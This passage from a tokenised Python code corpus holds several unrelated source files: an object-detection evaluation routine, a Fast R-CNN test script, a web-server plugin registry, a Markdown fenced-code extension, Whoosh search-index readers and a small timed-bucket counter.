<NUM_LIT:3> ] ) <EOL> iw = np . maximum ( ixmax - ixmin + <NUM_LIT:1.> , <NUM_LIT:0.> ) <EOL> ih = np . maximum ( iymax - iymin + <NUM_LIT:1.> , <NUM_LIT:0.> ) <EOL> inters = iw * ih <EOL> uni = ( ( bb [ <NUM_LIT:2> ] - bb [ <NUM_LIT:0> ] + <NUM_LIT:1.> ) * ( bb [ <NUM_LIT:3> ] - bb [ <NUM_LIT:1> ] + <NUM_LIT:1.> ) + <EOL> ( BBGT [ : , <NUM_LIT:2> ] - BBGT [ : , <NUM_LIT:0> ] + <NUM_LIT:1.> ) * <EOL> ( BBGT [ : , <NUM_LIT:3> ] - BBGT [ : , <NUM_LIT:1> ] + <NUM_LIT:1.> ) - inters ) <EOL> overlaps = inters / uni <EOL> ovmax = np . max ( overlaps ) <EOL> jmax = np . argmax ( overlaps ) <EOL> if ovmax > ovthresh : <EOL> if not R [ '<STR_LIT>' ] [ jmax ] : <EOL> if not R [ '<STR_LIT>' ] [ jmax ] : <EOL> tp [ d ] = <NUM_LIT:1.> <EOL> R [ '<STR_LIT>' ] [ jmax ] = <NUM_LIT:1> <EOL> else : <EOL> fp [ d ] = <NUM_LIT:1.> <EOL> else : <EOL> fp [ d ] = <NUM_LIT:1.> <EOL> fp = np . cumsum ( fp ) <EOL> tp = np . cumsum ( tp ) <EOL> rec = tp / float ( npos ) <EOL> prec = tp / np . maximum ( tp + fp , np . finfo ( np . float64 ) . eps ) <EOL> ap = voc_ap ( rec , prec , use_07_metric ) <EOL> return rec , prec , ap </s>
<s> """<STR_LIT>""" <EOL> import _init_paths <EOL> from fast_rcnn . test import test_net <EOL> from fast_rcnn . config import cfg , cfg_from_file , cfg_from_list <EOL> from datasets . factory import get_imdb <EOL> import caffe <EOL> import argparse <EOL> import pprint <EOL> import time , os , sys <EOL> def parse_args ( ) : <EOL> """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , <EOL> default = <NUM_LIT:0> , type = int ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> default = None , type = str ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> default = None , type = str ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , default = None , type = str ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> default = True , type = bool ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , type = str ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , default = None , <EOL> nargs = argparse . REMAINDER ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> default = <NUM_LIT:100> , type = int ) <EOL> if len ( sys . argv ) == <NUM_LIT:1> : <EOL> parser . print_help ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> args = parser . parse_args ( ) <EOL> return args <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> args = parse_args ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( args ) <EOL> if args . cfg_file is not None : <EOL> cfg_from_file ( args . cfg_file ) <EOL> if args . set_cfgs is not None : <EOL> cfg_from_list ( args . set_cfgs ) <EOL> cfg . GPU_ID = args . gpu_id <EOL> print ( '<STR_LIT>' ) <EOL> pprint . pprint ( cfg ) <EOL> while not os . path . exists ( args . caffemodel ) and args . wait : <EOL> print ( '<STR_LIT>' . format ( args . caffemodel ) ) <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> caffe . set_mode_gpu ( ) <EOL> caffe . set_device ( args . gpu_id ) <EOL> net = caffe . Net ( args . prototxt , args . caffemodel , caffe . TEST ) <EOL> net . name = os . path . splitext ( os . path . basename ( args . caffemodel ) ) [ <NUM_LIT:0> ] <EOL> imdb = get_imdb ( args . imdb_name ) <EOL> imdb . competition_mode ( args . comp_mode ) <EOL> if not cfg . TEST . HAS_RPN : <EOL> imdb . set_proposal_method ( cfg . TEST . PROPOSAL_METHOD ) <EOL> test_net ( net , imdb , max_per_image = args . max_per_image , vis = args . vis ) </s>
<s> from serializable import Serializable <EOL> class StatusView ( Serializable ) : <EOL> def __init__ ( self , username , total_commands , total_sessions , <EOL> total_systems , total_commands_today , session_name , <EOL> session_start_time , session_total_commands ) : <EOL> self . username = username <EOL> self . total_commands = total_commands <EOL> self . total_sessions = total_sessions <EOL> self . total_systems = total_systems <EOL> self . total_commands_today = total_commands_today <EOL> self . session_name = session_name <EOL> self . session_start_time = session_start_time <EOL> self . session_total_commands = session_total_commands </s>
<s> import logging <EOL> import os <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> SEQUENCE_FIRST = <NUM_LIT:1000> <EOL> SEQUENCE_EARLY = <NUM_LIT> <EOL> SEQUENCE_NORMAL = <NUM_LIT> <EOL> SEQUENCE_LATE = <NUM_LIT:200> <EOL> SEQUENCE_LAST = <NUM_LIT:0> <EOL> class PluginBase ( object ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> self . sequence = seq <EOL> self . name = name <EOL> def __cmp__ ( self , other ) : <EOL> return other . sequence - self . sequence <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . sequence ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def plug_init ( self , server ) : <EOL> pass <EOL> class ServerPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_serverStart ( self , server ) : <EOL> pass <EOL> def plug_serverStop ( self , server ) : <EOL> pass <EOL> def plug_sessionCreated ( self , webapp , session , request ) : <EOL> pass <EOL> def plug_sessionDestroyed ( self , webapp , session , request ) : <EOL> pass <EOL> class PageProcessorPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_getPageProcessor ( self , webapp , handler , url , pathpart , query ) : <EOL> return None <EOL> class RequestPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_requestExecute ( self , webapp , snakelet , request , response ) : <EOL> return False <EOL> def plug_requestFinished ( self , webapp , snakelet , request , response , outputarray = [ None ] ) : <EOL> return False <EOL> class ErrorpagePlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_serverErrorpage ( self , path , code , message , explainTxt , outputStream ) : <EOL> return False <EOL> class SortedPluginDict ( dict ) : <EOL> def __init__ ( self , * args ) : <EOL> self . sortedlist = [ ] <EOL> dict . __init__ ( self , * args ) <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key , value ) <EOL> self . sortedlist = self . values ( ) <EOL> self . sortedlist . sort ( ) <EOL> PLUGINDIR = "<STR_LIT>" <EOL> class PluginRegistry ( object ) : <EOL> def __init__ ( self ) : <EOL> self . serverPlugins = SortedPluginDict ( ) <EOL> self . requestPlugins = SortedPluginDict ( ) <EOL> self . errorpagePlugins = SortedPluginDict ( ) <EOL> self . pageProcessorPlugins = SortedPluginDict ( ) <EOL> self . webapps = { } <EOL> def load ( self , server ) : <EOL> log . info ( "<STR_LIT>" ) <EOL> self . server = server <EOL> path = os . path . abspath ( __file__ ) <EOL> path = os . path . join ( os . path . split ( path ) [ <NUM_LIT:0> ] , PLUGINDIR ) <EOL> for fn in os . listdir ( path ) : <EOL> fullfn = os . path . join ( path , fn ) <EOL> if os . path . isdir ( fullfn ) : <EOL> if fn == "<STR_LIT>" or fn == "<STR_LIT>" : <EOL> continue <EOL> log . info ( "<STR_LIT>" , fn ) <EOL> try : <EOL> module = __import__ ( "<STR_LIT>" % fn , locals ( ) ) <EOL> module = getattr ( module . plugins , fn ) <EOL> enabled = getattr ( module , "<STR_LIT>" , True ) <EOL> if enabled and module . PLUGINS : <EOL> for pluginname in module . PLUGINS : <EOL> log . info ( "<STR_LIT>" + pluginname ) <EOL> clazz = getattr ( module , pluginname ) <EOL> plugin = clazz ( ) <EOL> othername = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> if othername : <EOL> pluginname = othername <EOL> plugin . name = pluginname <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( self . server ) <EOL> self . __getPluginCategory ( clazz ) [ pluginname ] = plugin <EOL> self . webapps [ pluginname ] = None <EOL> except Exception , x : <EOL> log . error ( "<STR_LIT>" , fn , x ) <EOL> raise <EOL> def addPlugin ( self , webapp , plugin ) : <EOL> if not isinstance ( plugin , PluginBase ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> category = self . __getPluginCategory ( plugin . __class__ ) <EOL> plugin . name = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> plugin . name = name = webapp . getName ( ) [ <NUM_LIT:0> ] + "<STR_LIT:/>" + ( plugin . name or plugin . __class__ . __name__ ) <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( webapp . server ) <EOL> if name in self . webapps : <EOL> raise ValueError ( "<STR_LIT>" + name ) <EOL> category [ name ] = plugin <EOL> self . webapps [ name ] = webapp . getName ( ) <EOL> def _addServerPlugin ( self , server , plugin ) : <EOL> if not isinstance ( plugin , PluginBase ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> category = self . __getPluginCategory ( plugin . __class__ ) <EOL> plugin . name = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> plugin . name = name = plugin . name or plugin . __class__ . __name__ <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( server ) <EOL> if name in self . webapps : <EOL> raise ValueError ( "<STR_LIT>" + name ) <EOL> category [ name ] = plugin <EOL> self . webapps [ name ] = None <EOL> def getPlugin ( self , name ) : <EOL> if self . serverPlugins . has_key ( name ) : <EOL> return self . serverPlugins [ name ] <EOL> elif self . pageProcessorPlugins . has_key ( name ) : <EOL> return self . pageProcessorPlugins [ name ] <EOL> elif self . requestPlugins . has_key ( name ) : <EOL> return self . requestPlugins [ name ] <EOL> elif self . errorpagePlugins . has_key ( name ) : <EOL> return self . errorpagePlugins [ name ] <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" + name ) <EOL> def getPluginNames ( self ) : <EOL> return self . serverPlugins . keys ( ) + self . pageProcessorPlugins . keys ( ) + self . requestPlugins . keys ( ) + self . errorpagePlugins . keys ( ) <EOL> def __getPluginCategory ( self , pluginclass ) : <EOL> if issubclass ( pluginclass , ServerPlugin ) : <EOL> return self . serverPlugins <EOL> elif issubclass ( pluginclass , PageProcessorPlugin ) : <EOL> return self . pageProcessorPlugins <EOL> elif issubclass ( pluginclass , RequestPlugin ) : <EOL> return self . requestPlugins <EOL> elif issubclass ( pluginclass , ErrorpagePlugin ) : <EOL> return self . errorpagePlugins <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" + str ( pluginclass ) ) <EOL> def __doall ( self , plugins , pluginMethod , * args ) : <EOL> for plugin in plugins : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> method ( * args ) <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> def __doall_returnval ( self , plugins , pluginMethod , * args ) : <EOL> for plugin in plugins : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> result = method ( * args ) <EOL> if result not in ( False , None ) : <EOL> return result <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> return None <EOL> def __doall_WA_returnval ( self , plugins , pluginMethod , webapp , * args ) : <EOL> webappname = webapp . getName ( ) <EOL> for plugin in plugins : <EOL> if self . webapps [ plugin . name ] in ( None , webappname ) : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> result = method ( webapp , * args ) <EOL> if result not in ( False , None ) : <EOL> return result <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> return None <EOL> def __doall_WA ( self , plugins , pluginMethod , webapp , * args ) : <EOL> webappname = webapp . getName ( ) <EOL> for plugin in plugins : <EOL> if self . webapps [ plugin . name ] in ( None , webappname ) : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> method ( webapp , * args ) <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> def serverStart ( self ) : <EOL> self . __doall ( self . serverPlugins . sortedlist , "<STR_LIT>" , self . server ) <EOL> def serverStop ( self ) : <EOL> log . info ( "<STR_LIT>" ) <EOL> self . __doall ( self . serverPlugins . sortedlist , "<STR_LIT>" , self . server ) <EOL> def sessionCreated ( self , webapp , session , request ) : <EOL> self . __doall_WA ( self . serverPlugins . sortedlist , "<STR_LIT>" , webapp , session , request ) <EOL> def sessionDestroyed ( self , webapp , session , request ) : <EOL> self . __doall_WA ( self . serverPlugins . sortedlist , "<STR_LIT>" , webapp , session , request ) <EOL> def serverErrorpage ( self , path , code , message , explain , output ) : <EOL> return self . __doall_returnval ( self . errorpagePlugins . sortedlist , "<STR_LIT>" , path , code , message , explain , output ) <EOL> def getPageProcessor ( self , webapp , handler , url , pathpart , query ) : <EOL> return self . __doall_WA_returnval ( self . pageProcessorPlugins . sortedlist , "<STR_LIT>" , webapp , handler , url , pathpart , query ) <EOL> def requestExecute ( self , webapp , snakelet , request , response ) : <EOL> return self . __doall_WA_returnval ( self . requestPlugins . sortedlist , "<STR_LIT>" , webapp , snakelet , request , response ) <EOL> def requestFinished ( self , webapp , snakelet , request , response , output = None ) : <EOL> outarray = [ output ] <EOL> self . __doall_WA_returnval ( self . requestPlugins . sortedlist , "<STR_LIT>" , webapp , snakelet , request , response , outarray ) <EOL> return outarray [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import markdown <EOL> from markdown . extensions . codehilite import CodeHilite , CodeHiliteExtension <EOL> FENCED_BLOCK_RE = re . compile ( r'<STR_LIT>' , <EOL> re . MULTILINE | re . DOTALL <EOL> ) <EOL> CODE_WRAP = '<STR_LIT>' <EOL> LANG_TAG = '<STR_LIT>' <EOL> class FencedCodeExtension ( markdown . Extension ) : <EOL> def extendMarkdown ( self , md , md_globals ) : <EOL> """<STR_LIT>""" <EOL> md . registerExtension ( self ) <EOL> md . preprocessors . add ( '<STR_LIT>' , <EOL> FencedBlockPreprocessor ( md ) , <EOL> "<STR_LIT>" ) <EOL> class FencedBlockPreprocessor ( markdown . preprocessors . Preprocessor ) : <EOL> def __init__ ( self , md ) : <EOL> markdown . preprocessors . Preprocessor . __init__ ( self , md ) <EOL> self . checked_for_codehilite = False <EOL> self . codehilite_conf = { } <EOL> def getConfig ( self , key ) : <EOL> if key in self . config : <EOL> return self . config [ key ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def run ( self , lines ) : <EOL> """<STR_LIT>""" <EOL> if not self . checked_for_codehilite : <EOL> for ext in self . markdown . registeredExtensions : <EOL> if isinstance ( ext , CodeHiliteExtension ) : <EOL> self . codehilite_conf = ext . config <EOL> break <EOL> self . checked_for_codehilite = True <EOL> text = "<STR_LIT:\n>" . join ( lines ) <EOL> while <NUM_LIT:1> : <EOL> m = FENCED_BLOCK_RE . search ( text ) <EOL> if m : <EOL> lang = '<STR_LIT>' <EOL> if m . group ( '<STR_LIT>' ) : <EOL> lang = LANG_TAG % m . group ( '<STR_LIT>' ) <EOL> if self . codehilite_conf : <EOL> highliter = CodeHilite ( m . group ( '<STR_LIT:code>' ) , <EOL> linenos = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> css_class = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> style = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> lang = ( m . group ( '<STR_LIT>' ) or None ) , <EOL> noclasses = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> code = highliter . hilite ( ) <EOL> else : <EOL> code = CODE_WRAP % ( lang , self . _escape ( m . group ( '<STR_LIT:code>' ) ) ) <EOL> placeholder = self . markdown . htmlStash . store ( code , safe = True ) <EOL> text = '<STR_LIT>' % ( text [ : m . start ( ) ] , placeholder , text [ m . end ( ) : ] ) <EOL> else : <EOL> break <EOL> return text . split ( "<STR_LIT:\n>" ) <EOL> def _escape ( self , txt ) : <EOL> """<STR_LIT>""" <EOL> txt = txt . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> return txt <EOL> def makeExtension ( configs = None ) : <EOL> return FencedCodeExtension ( configs = configs ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> from bisect import bisect_left <EOL> from whoosh . compat import iteritems , string_type , integer_types , xrange <EOL> from whoosh . filedb . fileindex import Segment <EOL> from whoosh . filedb . fieldcache import FieldCache , DefaultFieldCachingPolicy <EOL> from whoosh . matching import FilterMatcher , ListMatcher <EOL> from whoosh . reading import IndexReader , TermNotFound <EOL> SAVE_BY_DEFAULT = True <EOL> class SegmentReader ( IndexReader ) : <EOL> GZIP_CACHES = False <EOL> def __init__ ( self , storage , schema , segment , generation = None , codec = None ) : <EOL> self . storage = storage <EOL> self . schema = schema <EOL> self . segment = segment <EOL> self . _gen = generation <EOL> self . is_closed = False <EOL> self . _has_deletions = segment . has_deletions ( ) <EOL> self . _dc = segment . doc_count ( ) <EOL> self . _dc_all = segment . doc_count_all ( ) <EOL> if hasattr ( self . segment , "<STR_LIT>" ) : <EOL> self . segid = str ( self . segment . segment_id ( ) ) <EOL> else : <EOL> self . segid = Segment . _random_id ( ) <EOL> if codec is None : <EOL> from whoosh . codec . standard import StdCodec <EOL> codec = StdCodec ( self . storage ) <EOL> self . _codec = codec <EOL> self . _terms = codec . terms_reader ( self . segment ) <EOL> self . _lengths = codec . lengths_reader ( self . segment ) <EOL> self . _stored = codec . stored_fields_reader ( self . segment ) <EOL> self . _vectors = None <EOL> self . _dawg = None <EOL> self . set_caching_policy ( ) <EOL> def _open_vectors ( self ) : <EOL> if self . _vectors : <EOL> return <EOL> self . _vectors = self . _codec . vector_reader ( self . segment ) <EOL> def _open_dawg ( self ) : <EOL> if self . _dawg : <EOL> return <EOL> self . _dawg = self . _codec . word_graph ( self . segment ) <EOL> def has_deletions ( self ) : <EOL> return self . _has_deletions <EOL> def doc_count ( self ) : <EOL> return self . _dc <EOL> def doc_count_all ( self ) : <EOL> return self . _dc_all <EOL> def is_deleted ( self , docnum ) : <EOL> return self . segment . is_deleted ( docnum ) <EOL> def generation ( self ) : <EOL> return self . _gen <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . segment ) <EOL> def __contains__ ( self , term ) : <EOL> return term in self . _terms <EOL> def close ( self ) : <EOL> self . _terms . close ( ) <EOL> self . _lengths . close ( ) <EOL> self . _stored . close ( ) <EOL> if self . _vectors : <EOL> self . _vectors . close ( ) <EOL> self . caching_policy = None <EOL> self . is_closed = True <EOL> def stored_fields ( self , docnum ) : <EOL> assert docnum >= <NUM_LIT:0> <EOL> schema = self . schema <EOL> return dict ( item for item in iteritems ( self . _stored [ docnum ] ) <EOL> if item [ <NUM_LIT:0> ] in schema ) <EOL> def all_stored_fields ( self ) : <EOL> is_deleted = self . segment . is_deleted <EOL> sf = self . stored_fields <EOL> for docnum in xrange ( self . _dc_all ) : <EOL> if not is_deleted ( docnum ) : <EOL> yield sf ( docnum ) <EOL> def field_length ( self , fieldname ) : <EOL> return self . _lengths . field_length ( fieldname ) <EOL> def min_field_length ( self , fieldname ) : <EOL> return self . _lengths . min_field_length ( fieldname ) <EOL> def max_field_length ( self , fieldname ) : <EOL> return self . _lengths . max_field_length ( fieldname ) <EOL> def doc_field_length ( self , docnum , fieldname , default = <NUM_LIT:0> ) : <EOL> return self . _lengths . get ( docnum , fieldname , default = default ) <EOL> def has_vector ( self , docnum , fieldname ) : <EOL> if self . schema [ fieldname ] . vector : <EOL> self . _open_vectors ( ) <EOL> return ( docnum , fieldname ) in self . _vectors <EOL> else : <EOL> return False <EOL> def _test_field ( self , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> if self . schema [ fieldname ] . format is None : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> def all_terms ( self ) : <EOL> schema = self . schema <EOL> return ( ( fieldname , text ) for fieldname , text in self . _terms . keys ( ) <EOL> if fieldname in schema ) <EOL> def terms_from ( self , fieldname , prefix ) : <EOL> self . _test_field ( fieldname ) <EOL> schema = self . schema <EOL> return ( ( fname , text ) for fname , text <EOL> in self . _terms . keys_from ( ( fieldname , prefix ) ) <EOL> if fname in schema ) <EOL> def term_info ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms [ fieldname , text ] <EOL> except KeyError : <EOL> raise TermNotFound ( "<STR_LIT>" % ( fieldname , text ) ) <EOL> def _texts_in_fieldcache ( self , fieldname , prefix = '<STR_LIT>' ) : <EOL> texts = self . fieldcache ( fieldname ) . texts [ <NUM_LIT:1> : ] <EOL> if prefix : <EOL> i = bisect_left ( texts , prefix ) <EOL> while i < len ( texts ) and texts [ i ] . startswith ( prefix ) : <EOL> yield texts [ i ] <EOL> i += <NUM_LIT:1> <EOL> else : <EOL> for text in texts : <EOL> yield text <EOL> def expand_prefix ( self , fieldname , prefix ) : <EOL> self . _test_field ( fieldname ) <EOL> if self . fieldcache_loaded ( fieldname ) : <EOL> return self . _texts_in_fieldcache ( fieldname , prefix ) <EOL> else : <EOL> return IndexReader . expand_prefix ( self , fieldname , prefix ) <EOL> def lexicon ( self , fieldname ) : <EOL> self . _test_field ( fieldname ) <EOL> if self . fieldcache_loaded ( fieldname ) : <EOL> return self . _texts_in_fieldcache ( fieldname ) <EOL> else : <EOL> return IndexReader . lexicon ( self , fieldname ) <EOL> def __iter__ ( self ) : <EOL> schema = self . schema <EOL> return ( ( term , terminfo ) for term , terminfo in self . _terms . items ( ) <EOL> if term [ <NUM_LIT:0> ] in schema ) <EOL> def iter_from ( self , fieldname , text ) : <EOL> schema = self . schema <EOL> self . _test_field ( fieldname ) <EOL> for term , terminfo in self . _terms . items_from ( ( fieldname , text ) ) : <EOL> if term [ <NUM_LIT:0> ] not in schema : <EOL> continue <EOL> yield ( term , terminfo ) <EOL> def frequency ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms . frequency ( ( fieldname , text ) ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> def doc_frequency ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms . doc_frequency ( ( fieldname , text ) ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> def postings ( self , fieldname , text , scorer = None ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> format_ = self . schema [ fieldname ] . format <EOL> matcher = self . _terms . matcher ( fieldname , text , format_ , scorer = scorer ) <EOL> deleted = self . segment . deleted <EOL> if deleted : <EOL> matcher = FilterMatcher ( matcher , deleted , exclude = True ) <EOL> return matcher <EOL> def vector ( self , docnum , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> vformat = self . schema [ fieldname ] . vector <EOL> if not vformat : <EOL> raise Exception ( "<STR_LIT>" % fieldname ) <EOL> self . _open_vectors ( ) <EOL> return self . _vectors . matcher ( docnum , fieldname , vformat ) <EOL> def has_word_graph ( self , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> return False <EOL> if not self . schema [ fieldname ] . spelling : <EOL> return False <EOL> self . _open_dawg ( ) <EOL> return fieldname in self . _dawg <EOL> def word_graph ( self , fieldname ) : <EOL> if not self . has_word_graph ( fieldname ) : <EOL> raise Exception ( "<STR_LIT>" % fieldname ) <EOL> return self . _dawg . edge ( fieldname ) <EOL> def supports_caches ( self ) : <EOL> return True <EOL> def set_caching_policy ( self , cp = None , save = True , storage = None ) : <EOL> """<STR_LIT>""" <EOL> if not cp : <EOL> if save and storage is None : <EOL> storage = self . storage <EOL> elif not save : <EOL> storage = None <EOL> cp = DefaultFieldCachingPolicy ( self . segment . segment_id ( ) , <EOL> storage = storage ) <EOL> if type ( cp ) is type : <EOL> cp = cp ( ) <EOL> self . caching_policy = cp <EOL> def _fieldkey ( self , fieldname ) : <EOL> return "<STR_LIT>" % ( self . segid , fieldname ) <EOL> def fieldcache ( self , fieldname , save = SAVE_BY_DEFAULT ) : <EOL> """<STR_LIT>""" <EOL> key = self . _fieldkey ( fieldname ) <EOL> fc = self . caching_policy . get ( key ) <EOL> if not fc : <EOL> fc = FieldCache . from_field ( self , fieldname ) <EOL> self . caching_policy . put ( key , fc , save = save ) <EOL> return fc <EOL> def fieldcache_available ( self , fieldname ) : <EOL> """<STR_LIT>""" <EOL> return self . _fieldkey ( fieldname ) in self . caching_policy <EOL> def fieldcache_loaded ( self , fieldname ) : <EOL> """<STR_LIT>""" <EOL> return self . caching_policy . is_loaded ( self . _fieldkey ( fieldname ) ) <EOL> def unload_fieldcache ( self , name ) : <EOL> self . caching_policy . delete ( self . _fieldkey ( name ) ) </s>
<s> from whoosh . util import rcompile <EOL> class Tagger ( object ) : <EOL> """<STR_LIT>""" <EOL> def match ( self , parser , text , pos ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class RegexTagger ( Tagger ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expr ) : <EOL> self . expr = rcompile ( expr ) <EOL> def match ( self , parser , text , pos ) : <EOL> match = self . expr . match ( text , pos ) <EOL> if match : <EOL> node = self . create ( parser , match ) <EOL> if node is None : <EOL> raise Exception ( "<STR_LIT>" <EOL> % ( self . __class__ . __name__ ) ) <EOL> return node . set_range ( match . start ( ) , match . end ( ) ) <EOL> def create ( self , parser , match ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class FnTagger ( RegexTagger ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expr , fn ) : <EOL> RegexTagger . __init__ ( self , expr ) <EOL> self . fn = fn <EOL> def create ( self , parser , match ) : <EOL> return self . fn ( ** match . groupdict ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> try : <EOL> import json <EOL> except : <EOL> import simplejson as json <EOL> class TimedBucket : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , granularity , expiration ) : <EOL> self . granularity = granularity <EOL> self . expiration = expiration <EOL> self . buckets = { } <EOL> self . start = time . time ( ) <EOL> def addToBucket ( self , value = <NUM_LIT:1> ) : <EOL> now = time . time ( ) <EOL> currslot = int ( now ) / self . granularity * self . granularity <EOL> if currslot in self . buckets . keys ( ) : <EOL> self . buckets [ currslot ] = self . buckets [ currslot ] + value <EOL> else : <EOL> self . buckets [ currslot ] = value <EOL> try : <EOL> del self . buckets [ currslot - self . expiration ] <EOL> except : <EOL> pass <EOL> def getBuckets ( self ) : <EOL> return self . buckets <EOL> def getJSON ( self ) : <EOL> return json . dumps ( self . buckets ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> a = TimedBucket ( <NUM_LIT:5> , <NUM_LIT:15> ) <EOL> for x in range ( <NUM_LIT> ) : <EOL> a . addToBucket ( <NUM_LIT:1> ) <EOL> print a . getBuckets ( ) <EOL> time . sleep ( <NUM_LIT:2> ) </s>
